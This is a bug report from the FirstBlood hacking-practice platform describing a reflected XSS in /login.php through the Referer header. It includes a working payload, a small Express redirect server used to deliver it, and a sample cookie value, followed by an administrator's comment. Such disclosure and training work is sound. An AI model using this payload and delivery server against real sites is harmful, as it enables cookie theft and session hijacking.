FirstBlood-#583 — Reflective XSS via Referer on login.php endpoint
This issue was discovered on FirstBlood v2
On 2021-10-26, panya Level 7 reported:
The site contains is vulnerable to Reflective XSS on the /login.php
endpoint. It reflects the Referer
header value inside the "Return to previous page" link's href (in single quotes).
Steps to reproduce:
- Open this url http://ztn.me/test'onclick=alert(document.cookie);return(false)//
It is hosted on my server:
const express = require('express');
const app = express();
app.get('*', (req, res) => {
res.set('Referrer-Policy', 'unsafe-url');
res.set('Content-Type', 'text/html');
res.end('<script>location.replace("https://fcde991cdbc2-panya.a.firstbloodhackers.com/login.php");</script>');
});
app.listen(80);
- The browser will redirect you to https://fcde991cdbc2-panya.a.firstbloodhackers.com/login.php
- Click on the "Return to previous page" link.
Actual result:
There will be an alert with the user's document.cookie
value (doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9
in our case).
Expected result:
The Referer
header's value should be properly escaped or sanitized. The alert should not be shown.
Impact:
An attacker could execute JS code on behalf of a user of this site.
P3 Medium
Endpoint: /login.php
Parameter: Referer:
Payload: http://ztn.me/test'onclick=alert(document.cookie);return(false)//
FirstBlood ID: 19
Vulnerability Type: Reflective XSS
The parameter ?ref= on login.php was fixed and instead the use of
$_SERVER['HTTP_REFERER'];
was used. Patrice tested in Chrome and Firefox and saw it was secure, but some users still use Internet Explorer 10 (governments for example!) and the Referer header is vulnerable to reflective XSS.
Creator & Administrator
Nice panya! Fun fact, Even though the referrer is vulnerable, on a lot of the reports for this the payload provided simply wouldn't work (use of < > etc). So kudos for providing a working PoC. Actually for me when testing it would only work on IE as it seems for me on latest version of Chrome/FF the ' character is now filtered. I'll play some more though and may update this bug description